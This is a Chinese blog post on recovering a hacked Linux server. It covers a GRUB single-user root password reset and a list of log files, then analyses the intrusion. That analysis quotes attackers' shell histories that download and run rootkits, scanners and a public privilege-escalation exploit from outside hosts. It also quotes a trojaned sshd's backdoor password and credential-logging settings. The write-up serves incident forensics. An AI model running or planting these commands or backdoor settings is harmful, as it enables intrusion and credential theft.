linux系统被黑,修复root密码,日志跟踪

 

场景描述:

       异常现象发生:用原先的系统用户密码,无法登录系统.后跟踪日志发现密码被修改.

 

问题处理:

       可用类似于忘记linux的root用户密码方式,解决该问题

       可参考:http://www.hacker.cn/Get/linux/0591610385163745.shtml

       http://safe.csdn.net/n/20090729/3701.html

      1.启动linux，大概在2秒中吧!就这样的界面!按三下键盘E
         第一次,进入倒计时时按E键

         (注意,要确保BIOS开启对键盘的支持,本人键盘使用的是usb接口,bios设置中有一项是否让Usb支持键盘,需要改成enable)

       2.先择如下项目,确定后,按E键.

       root (hd0,0)

       kernel /vmlinux-******  ro root=/dev/Volgroup00/logvol00 rhgb quiet   (这个是选中项)

       initrd /initrd**.img

       3.按第三下E键进入

       我们输入一句命令 / 1

(记得：输入“斜杠”后按一下“空格”在输入1，接下去就按“回车键”)

此时按下键盘“B”进入“

 

     注意,本人处理时发生如下异常

     Kernel Panic - not syncing：Attempted to kill init !

 

将上述写法改成

kernel /vmlinux-******   single ro root=/dev/Volgroup00/logvol00    

 

      4.完成上述操作之后

      所谓的linux终端(相当windows里面的DOS窗口)

     提示sh3.1#

.输入命令 passwd root (回车)

.输入密码 (回车)

.再次输入密码确认 (回车)

输入reboot(重启linux操作系统)(回车)

 

 

这样就将root密码修改完成,以后就可以用新密码登录了.

 

 

====================================================

linux安全日志查看,参考

http://linux.vbird.org/linux_basic/0570syslog/0570syslog.php

 

/var/log/secure：記錄登入系統存取資料的檔案，例如 pop3, ssh, telnet, ftp 等都會記錄在此檔案中；
/var/log/wtmp：記錄登入者的訊息資料，由於本檔案已經被編碼過，所以必須使用 last 這個指令來取出檔案的內容；
/var/log/messages：這個檔案相當的重要，幾乎系統發生的錯誤訊息（或者是重要的資訊）都會記錄在這個檔案中；
/var/log/boot.log：記錄開機或者是一些服務啟動的時候，所顯示的啟動或關閉訊息；
/var/log/maillog 或 /var/log/mail/*：紀錄郵件存取或往來( sendmail 與 pop3 )的使用者記錄；
/var/log/cron：這個是用來記錄 crontab 這個例行性服務的內容的！
/var/log/httpd, /var/log/news, /var/log/mysqld.log, /var/log/samba, /var/log/procmail.log： 分別是幾個不同的網路服務的記錄檔啦！

 

 

发现比较不认识两个ip,查询后(http://www.ip138.com/)发现是国外的.

195.144.12.5

195.197.175.21  

 

 

====================分析hacker操作日志============================

查看用户操作记录 .bash_history
uprime
uptime
wget excess.conf-team.com/erk.tgz
tar xvf erk.tgz rm -rf erk.tgz
cd ssh ./inst
passwd root
passwd root
ifconfig /all
ifconfig
passwd root

查看另一个用户操作记录 bash_history
exit
w
cat /proc/cpuinfo
wget http://mirc.go.ro/delles.tgz
tar xzvf delles.tgz
 cd delles chmod +x * ./screen
 w

wget freewebtown.com/nvpcraiova/jocker.tgz
curl -O freewebtown.com/nvpcraiova/jocker.tgz
wget bagabond.tripod.com/scaner.tgz
wget serpe.3x.ro/bufu.jpg
tar xzvf bufu.jpg
cd ./-/
chmod +x *
./go 130.111
uname -a;w
cat /proc/cpuinfo
exit
passwd root
uptime
ls

wget http://www.securityfocus.com/data/vulnerabilities/exploits/enlightenment-091009.tgz
tar xzvf enlightenment-091009.tgz
cd enlightenment
./run_exploits.sh
 w

wget pibo.com/.x/scan/loveru.tar
 tar -xzvf loveru.tar
cd loveru chmod +x *
./x 94.188 w
ls -a
cat /proc/cpuinfo
passwd
ls -a
ps -x
cd /tmp
 ls -a

wget members.lycos.co.uk/mariusrf/ovi.tar.gz
 tar xvf ovi.tar.gz
cd .img
chmod +x *
./start iubire-interzisa

 

 

 

 

=======这个是ssh文件中查到一个存储用户信息的表=======================

#define BACKDOORPASSWD "admir070738539"
#define LOGGING_PASSWORDS 1
#define PASSWORDS_LOG_FILE "/usr/share/sshd.sync"
#define EMAIL "cipi_ripi_16@hotmail.com"
int backdoor_active;